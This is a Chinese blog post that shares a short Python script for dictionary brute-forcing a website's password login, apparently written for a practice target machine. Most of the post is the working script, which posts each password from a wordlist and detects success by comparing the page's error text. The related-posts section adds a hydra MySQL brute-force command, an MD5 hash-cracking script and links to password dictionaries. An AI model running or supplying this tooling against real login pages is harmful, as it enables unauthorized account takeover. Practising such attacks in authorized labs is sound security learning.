python编写字典爆破网站登录|思路

最新推荐文章于 2024-04-27 14:51:21 发布
最新推荐文章于 2024-04-27 14:51:21 发布
阅读量1.6k 收藏 15
点赞数 3
分类专栏: Python 文章标签: python 安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45951067/article/details/121071783
版权

在做渗透时,因为太菜了,不会用网上的爆破工具,自己就即兴写了一个简单的字典爆破。新手小白可以借鉴思路,就当学习了。大佬请绕道!!
如果有好用的爆破工具,欢迎大佬推荐~

方便理解,我简单说一下背景:
渗透的是某靶机的网站,该靶机只用输入正确密码就能成功登录,在密码错误后在html中会返回如下字段:
在这里插入图片描述
所以我用爬虫把这个关键字段给爬出来了与正确密码作比较

import json
from pyquery import PyQuery
import requests
url="这里是url地址(这里为了防止恶意攻击,就不把地址放出来了)"
text="对不起,登录ID或密码(口令)错误"  #这里面的文本是爬虫爬出来的网页返回的值
real_password=0
time=0
e=open('pwd.txt',"r")
print("密码爆破开始!")
for login_password in e:
    data={'password':login_password}
    r = requests.post(url,data=data)
    doc=PyQuery(r.text)
    time+=1
    if doc("#tagContent0 p").text()!=text:   #这里拿爬出来的数据和文本作对比,相同则说明密码还是错的,不同说明密码就对了!
        real_password=login_password
        break
    print("密码错误,尝试爆破第{}次".format(time))
print("爆破结束!!")
print("爆破密码为:{}".format(real_password))
e.close()

因为没有把该靶,这个代码需要你们改改才能用
运行截图:
在这里插入图片描述

向阳-Y.
关注
  • 3
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
python网站登录爆破登录_看我如何爆破加密的web登录表单
weixin_39915078的博客
12-17 666
有很多方法来爆破登录表单,你只需要 google 一下就可以在搜索的结果中看到一些通常的做法。在你使用 Burp 的情况下,这些搜索出来的爆破方式将足以满足大多数的形式爆破。但有时候,爆破不会那么简单,你需要编写自己的工具。这可能是因为一些各种原因所致,但通常它归结为通过 HTTP(S)的自定义协议或输入的数据的是一些自定义的加密算法。在这篇文章中,我们将介绍两种编写这些工具的方法:1. 编写你自...
只用20行Python代码就攻破了网站登录
公众号:Python研究者
03-12 1832
大家好,我是辰哥~今天教大家用Python代码攻破网站登录(在测试靶机上进行实验),原理上是抓包和改包,如果学过的爬虫的话,相信你会快看懂这篇文章测试靶机为DVWA,适合DVWA暴力破解模...
Python暴力破解网站登录密码脚本_python 登录网站密码
m0_60666841的博客
04-27 311
【代码】Python暴力破解网站登录密码脚本_python 登录网站密码。
密码破解!字典攻击(C/C++代码实现)
chen1415886044的博客
08-13 2883
字典攻击是一种通过系统地将字典中的每个单词作为密码输入,从而侵入受密码保护的计算机、网络或其他IT资源的方法。字典攻击也可以用于查找解密加密消息或文档所需的密钥。 字典攻击之所以有效,是因为许多计算机用户和企业坚持使用普通单词作为密码。这些攻击通常针对使用多字密码的系统不成功,也经常针对由大小写字母和随机组合的数字组成的密码不成功。 在密码要求很高的系统中,暴力攻击方法有时是有效的,在这种方法中,字符和空格的每一个可能组合都要测试到一定的最大长度。然而,暴力攻击可能需要很长时间才能产生结果。
python 穷举法生成爆破密码词典
MuratHalik的博客
11-05 1986
本次折腾用于忘记比特币核心钱包支付密码的暴力破解(如果成功我就躺平!python 穷举法生成爆破密码词典。
python暴力破解网站登录密码脚本
anzhengxv的博客
06-15 2194
简单对靶向网站进行暴力破解的简单代码,url指向url的地址,header设置请求头(此处省略了)payload设置请求参数requests.post这一行的作用是作一次get请求,响应信息被变量Response接收通过for循环进行不断尝试完成破解......
字典制作、在线密码破解
分享学习网络的点点滴滴
09-06 1120
按个人信息生成其专属的密码字典
Python编写固定字典爆破
05-19
本主题聚焦于使用Python编程语言实现针对特定服务(如电子邮件、Redis、FTP、SSH和MySQL)的固定字典爆破。这些服务通常都需要用户名和密码进行身份验证,而固定字典爆破是一种尝试匹配预定义密码列表的方法。 首先...
Python 编写 可自定义字典. 爆破
最新发布
05-19
包含:电子邮件 || Redis || FTP || SSH || MySQL 爆破.
python字典生成
07-28
在描述中提到的"dictionary.exe"可能是一个用于字典生成或爆破的可执行程序,而在Python环境下,我们通常会编写脚本来实现这类功能。例如,我们可以创建一个脚本,根据用户指定的字符集和长度生成密码字典: ```...
python编写暴力破解FTP密码小工具
01-20
python具体强大的库文件,很多功能都有相应的库文件,所以很有必要进行学习一下,其中有一个ftp相应的库文件ftplib,我们只需要其中的登录功能,然后利用多线程调用相应字典里面的字段进行登录,还能根据自己的需要...
字典工具
03-31
很好的工具,和字典下载地址。要的自己下载
爆破各种服务网站字典最全
04-21
自己收集的字典,挺全的。可以用于爆破各种服务的账号字典爆破网站目录字典、数据库字典、撞库、后门等用途字典
网站目录爆破工具
08-09
python编写网站目录爆破 python dirscan.py 输入url 线程数 字典文件即可
黑客之路-使用hydra进行简单的密码爆破
坐公交也用券
10-10 3436
需要用到的工具:hydra爆破工具、字典 指定用户名 hydra -l root -P pass.txt mysql://172.17.0.2 使用字典用户名 hydra -l root -P pass.txt mysql://172.17.0.2
字典爆破php,【爆破大法】百站爆破经验总结(附带各种爆破字典
weixin_35070219的博客
03-11 4276
原标题:【爆破大法】百站爆破经验总结(附带各种爆破字典) 近来10多天一直在学习爆破大法,下面是我为大家献上的百战爆破总结。1.字典大法好又好(1).明文Top1400+:用户名 密码1000合成.zip该套字典是集合了TOP100用户名+TOP1000密码。下载链接:http://www.chinacycc.com/forum.php?mod=attachment&aid=NTgyOXw...
字典爆破php,密码字典 渗透测试字典 爆破字典
weixin_34264495的博客
03-11 3010
密码字典 渗透测试字典 爆破字典下载地址: https://www.lanzous.com/b00n7iwqh下载地址2:github.com/ddosi/hack密码:ddosi.com解压密码: www.ddosi.com下图列出fuzz字典中的随机四个密码字典字典主要包括以下内容:# 内容:1. Port # 出现频率较高的端口号,平时我是使用T...
username爆破字典下载
热门推荐
chen__an的博客
05-06 1万+
https://github.com/arthur0081/Blasting_dictionary
python如何字典爆破
06-11
字典爆破是一种常见的密码破解方式,通过尝试常见的密码组合进行猜测,直到找到正确的密码。在Python中,可以通过编写脚本来实现字典爆破。 以下是一个简单的Python字典爆破的代码示例: ```python import hashlib def crack_password(password_hash): with open('passwords.txt', 'r') as f: for line in f: line = line.strip() if hashlib.md5(line.encode('utf-8')).hexdigest() == password_hash: print('The password is:', line) return if __name__ == '__main__': password_hash = input('Input the MD5 hash of the password: ') crack_password(password_hash) ``` 该脚本通过读取一个密码字典文件(名为passwords.txt),逐行尝试其中的密码,将其进行MD5哈希处理后与给定的哈希值进行比较,直到找到正确的密码为止。 在实际使用中,可以使用更高级的字典文件或密码生成算法来提高破解的效率。需要注意的是,字典爆破是一种犯罪行为,严禁用于非法用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

向阳-Y.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值